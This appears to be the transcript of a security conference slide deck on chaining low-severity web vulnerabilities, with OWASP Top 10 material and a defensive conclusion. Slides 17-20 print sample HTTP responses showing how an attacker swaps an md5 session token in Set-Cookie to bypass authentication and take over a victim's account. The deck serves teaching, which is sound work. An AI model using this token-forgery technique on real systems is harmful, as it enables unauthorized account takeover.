Vulnerability Chaining

Explore the significant impact of chaining low vulnerabilities in cybersecurity, illustrated through examples and best practices. Learn about common mistakes and the importance of understanding the behavior of applications to prevent security risks.

• Vulnerability Chaining
• Cybersecurity Impact
• Best Practices
• Application Behavior
• Security Risks

pnad Follow

Uploaded on Feb 18, 2025 | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.

Presentation Transcript

1. Vulnerability Chaining Every Low Issue Has its big impact Chandrakant Nial Security Analyst

2. BIO Chandrakant Nial is a security analyst and a practicing developer and a security bug hunter in Bhubaneswar. His career span over 3 years including TCS and as an independent bounty hunter. His education includes Bachelor in Computer Sc. from BPUT, Orissa.

3. Agenda OWASP TOP 10 2013 Some low issue that we come across Typical mistake by developers Chaining Process Analyzing the response and understanding behavior of application Using multiple vulnerability Knowledge on various technology Impacts Defacing website Account take over Delete codebase, DataBases, etc Best practices/References Conclusion

4. Top 10 List A1-Injection A2-Broken Authentication and Session Management A3-Cross-Site Scripting (XSS) A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards

5. Low Issues Unwanted Methods (PUT,DELETE,HEAD) Cookie Low flag Encryption (URL,Base64) Directory traversal Banner grabbing Url Redirection Information Disclose ,Mixed Content

6. Typical Mistakes Ignorance Unaware Of security things They don t care security but functionality is all they want

7. Chaining Process Low bug

8. Chaining Process Chained BUG

9. Chaining Process Example 1

10. Chaining Process Examples

11. Chaining Process Examples

12. Chaining Process Examples

13. Chaining Process Examples

14. Chaining Process Examples

15. Chaining Process Examples https://hackerone.com/reports/42961

16. Chaining Process Examples https://hackerone.com/reports/42961

17. Chaining Process By passing authentication Consider two user Attackers Login ID: attackerloginid md5 hash value: 636559678682db9e21c958a4df44eea4 e9fc2abd9060fde1a67e3367b7d64bd0 Victims Login ID: victimloginid md5 hash value: http://www.websecresearch.com/2014/05/a- way-to-bypass-authentication.html

18. Authentication Bypass Original Server Response Using Attackers Account with Wrong Password HTTP/1.1 200 OK Date: Wed, 7 May 2014 21:17:27 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/ Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 {"failed":false}

19. Authentication Bypass Original Response Using Attackers Account with Right Password: HTTP/1.1 302 Found Date: Wed, 7 May 2014 21:17:27 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/ Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/ Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 {"success":true}

20. Authentication Bypass Modified Response in which the attacker modified the Response Code, Set-Cookies & there Values, Status Code Values and Sent it as a Request: HTTP/1.1 302 Found Date: Wed, 7 May 2014 21:17:27 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/ Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/ Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 {"success":true}

21. Moral How to Start Chaining? 1. Find Vulnerability 2. Analyze bugs 3. Research on customer s business

22. Moral How to Start Chaining? 1. Find Vulnerability 2. Analyze bugs 3. Research on customer s business

23. Demo DEMO

24. Moral Vulnerable code + weak Configuration = Dangerous Exploitation Every Vulnerability need to patch irrespective of severity Questions Please